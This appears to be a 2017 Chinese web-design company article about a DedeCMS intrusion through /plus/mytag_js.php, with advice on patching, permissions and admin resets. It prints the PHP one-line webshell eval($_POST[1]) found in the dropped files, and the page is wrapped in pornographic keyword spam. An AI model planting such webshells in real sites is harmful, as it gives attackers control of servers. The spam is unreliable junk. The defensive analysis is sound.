99精品久久久久久久I国产精品都在这里I天天草avI天堂av网在线I国产亚洲久久I国产精品va最新国产精品视频I久久国产精品偷I国产成人99av超碰超爽

MENU 服務 案例
網站建設-網站設計-北京網站建設-高端網站制作公司-尚品中國
我們通過擁抱變化創造
360°的品牌價值__
簡體
簡體中文 English

尚品與山東真諾智能設備有限公司簽署網站改版合作協議

類型:尚品動態 了解更多

談Dedecms一些隱患以及如何預防風險

來源:尚品中國| 類型:網站百科 |時間:2017-11-30

 dedecms一直是很火的建站cms,主要得益于兩大站長網的鼎力支持;不過,人火是非多,cms太火了同樣會被別有用心的人盯上。我的網站一直在使用dedecms,前段時間又一次受到攻擊,攻擊的目的很簡單,那么便是黑鏈,知道后稍微修改下代碼就恢復了,不是很嚴重;這段時間網站又被莫名上傳文件,類似前一次,雖然對方還沒來得及修改網站模板,不過這說明網站安全防患還未到位,對方任何時候都可能再次取得管理員權限,所以要特別注意網站的安全防患措施。

  因為我比較喜歡尋根究底,所以就去網上找了一下相關的資料,發現這確實是dedecms的漏洞,黑客可以利用多維的變量繞過正則檢測,漏洞主要發生在/plus/mytag_js.php中,原理便是準備一個MySQL數據庫來攻擊已知網站的數據庫,通過向數據庫中寫入一句話的代碼,只要成功寫入,那么以后便可以利用這些代碼來獲得后臺管理員權限。

  結合我的網站被攻擊已經別人類似的經歷來看,黑客寫入的文件主要存在于/plus/文件夾下,目前已知的幾個文件包括ga.php、log.php、b.php、b1.php等,文件的特征便是短小,內容很少,可能寫入的時候不是很方便,不過這些代碼的作用確實不小的。

  下面這是ga.php文件中的部分代碼:

 

no
eval($_POST[1])
?>
 
no
eval($_POST[1])
?>
 
no
eval($_POST[1])
?>

  實際的代碼比上面截取的要長,不過都是這段代碼的重復,至于log.php的代碼,同這個類似,只有一句話,簡單明了,如果你對網絡安全稍有了解,那么會知道是php一句話木馬,使用部分指定的工具可以執行這段代碼,預計是破解密碼的功能。

  既然已經知道對方是利用什么樣的漏洞,同時知道對方利用什么樣的原理來利用漏洞,那么要怎么預防這些危險的事發生呢?經過查詢大量的資料,我初步整理出下面這些預防漏洞被利用的步驟,希望對同樣適用dedecms的站長朋友們有所幫助。

  一、升級版本打好補丁設置目錄權限

  這是官方對此的解決辦法,不管你使用的是什么版本的dedecms,都要及時在后臺升級版本自動更新補丁,這是避免漏洞被利用的最重要的一步;同時官方還提供設置目錄的方法,主要是設置data、templets、uploads、a為可讀寫不可執行權限;include、member、plus、后臺管理目錄等設置為可執行可讀不可寫入權限;刪除install及special目錄,具體如何設置見官方說明。

  二、修改admin賬號及密碼

  黑客可能是利用默認admin賬號,隨后推測密碼來破解的,所以修改默認的admin賬號非常重要,至于如何修改,方法很多,比較有效的是用phpadmin登陸網站數據庫,找到dede_admin數據庫表(dede是數據庫表前綴),修改其中userid及pwd兩項,其中密碼一定要修改成f297a57a5a743894a0e4,這是默認的密碼admin;修改后去后臺登陸,登陸dede后臺后修改密碼。

  三、別的值得注意的地方

  至于更多的細節,同樣要注意,盡量別選擇太廉價的空間,太廉價的空間很容易出現服務器本身的安全問題,只要服務器出現問題,整個服務器下面的網站都沒救了。還有便是,如果沒必要,盡量別開通會員注冊什么的,使用起來很麻煩;至于網站后臺目錄,不要寫到robots.txt里面,同時每個月至少換一次,管理員密碼什么的同樣要更換,避免和別的賬號密碼相同被推測出來。

  經過這幾次網站被攻擊的實例,不得不說,互聯網不是一個可以安心睡大覺的網,作為站長,算是織網的人,更應該注重網絡安全;只要按照要求去做到了這些防范措施,不說100%,至少95%的可能不會被順利取得后臺權限。

來源聲明:本文章系尚品中國編輯原創或采編整理,如需轉載請注明來自尚品中國。以上內容部分(包含圖片、文字)來源于網絡,如有侵權,請及時與本站聯系(010-60259772)。
TAG標簽:

如果您的網站可以增加轉化次數并提高客戶滿意度,該怎么辦?

預約專業咨詢顧問溝通!

*尚品專業顧問將盡快與您聯系

免責聲明

非常感謝您訪問我們的網站。在您使用本網站之前,請您仔細閱讀本聲明的所有條款。

1、本站部分內容來源自網絡,涉及到的部分文章和圖片版權屬于原作者,本站轉載僅供大家學習和交流,切勿用于任何商業活動。

2、本站不承擔用戶因使用這些資源對自己和他人造成任何形式的損失或傷害。

3、本聲明未涉及的問題參見國家有關法律法規,當本聲明與國家法律法規沖突時,以國家法律法規為準。

4、如果侵害了您的合法權益,請您及時與我們,我們會在第一時間刪除相關內容!

聯系方式:010-60259772
電子郵件:394588593@qq.com

免責聲明

非常感謝您訪問我們的網站。在您使用本網站之前,請您仔細閱讀本聲明的所有條款。

1、本站部分內容來源自網絡,涉及到的部分文章和圖片版權屬于原作者,本站轉載僅供大家學習和交流,切勿用于任何商業活動。

2、本站不承擔用戶因使用這些資源對自己和他人造成任何形式的損失或傷害。

3、本聲明未涉及的問題參見國家有關法律法規,當本聲明與國家法律法規沖突時,以國家法律法規為準。

4、如果侵害了您的合法權益,請您及時與我們,我們會在第一時間刪除相關內容!

聯系方式:010-60259772
電子郵件:394588593@qq.com

主站蜘蛛池模板: 一区中文字幕 | 国产69精品久久久久久久久久 | 亚洲精品视频大全 | 国产99色| 岛国av在线| 亚洲精品乱码久久久久久久久久 | 国产女v资源在线观看 | 性色xxxxhd| 国内精品久久久久久久久久清纯 | 天天操天天干天天摸 | 久久免费视频精品 | 亚洲日本精品视频 | 国产视频1 | 日韩午夜电影网 | 成年人黄色免费视频 | 在线观看精品视频 | 久久99国产精品久久 | 欧美一级xxxx | 91亚州 | 国模视频一区二区 | 日本在线视频一区二区三区 | 成人免费视频播放 | 久久精品网站视频 | 日韩av电影中文字幕 | 久草香蕉在线视频 | 亚洲91网站 | 国产日韩在线视频 | 国产精品久久久久久超碰 | 美女黄久久 | 日韩精品一区二区在线视频 | 色就色,综合激情 | 亚洲激情视频在线 | 欧美激情综合五月色丁香 | 久久亚洲综合国产精品99麻豆的功能介绍 | av色网站 | 免费日韩高清 | 在线国产日韩 | 99视频在线免费播放 | 在线播放 日韩专区 | 亚洲免费色 | 激情综合五月 | 国产美女黄网站免费 | 日韩欧美xx| 亚洲天堂精品视频 | 又湿又紧又大又爽a视频国产 | 国产资源精品在线观看 | 在线免费观看国产精品 | 操操操人人人 | 婷婷四房综合激情五月 | 粉嫩av一区二区三区入口 | 人人澡人人模 | 日本精品久久久久中文字幕5 | 麻豆视频免费在线观看 | 国产精品久久久久久五月尺 | 91亚洲国产成人久久精品网站 | 日韩一区二区三区高清在线观看 | 亚洲精品久久久久www | 免费视频成人 | 九九99 | 国产精品久久久久久久久久直播 | 热re99久久精品国产99热 | 色婷婷电影网 | 国产手机免费视频 | 黄色大片视频网站 | 99久久国产免费看 | www.伊人色.com| 久久久色 | 有码视频在线观看 | 久久久久欧美精品999 | 国产一区二区三区在线免费观看 | 91精品久久久久久粉嫩 | 美女视频黄在线观看 | 日韩视频专区 | 婷婷色在线资源 | 国产精品乱码久久 | 91在线免费视频 | 九九视频精品免费 | 狂野欧美激情性xxxx欧美 | 中文字幕在线观看免费高清完整版 | 中文字幕免费一区 | 欧美作爱视频 | 久久人人97超碰国产公开结果 | 亚洲日本va午夜在线影院 | 免费久久久久久 | 欧美a在线免费观看 | 久久综合操 | 日韩激情久久 | 超碰97免费在线 | 九九热免费精品视频 | 国产又黄又爽又猛视频日本 | 韩国一区二区三区在线观看 | 天天插综合 | 福利视频一区二区 | 丁香婷婷久久久综合精品国产 | 亚洲精品久久在线 | 日本超碰在线 | 日夜夜精品视频 | 国产成人亚洲在线电影 | 免费在线91 |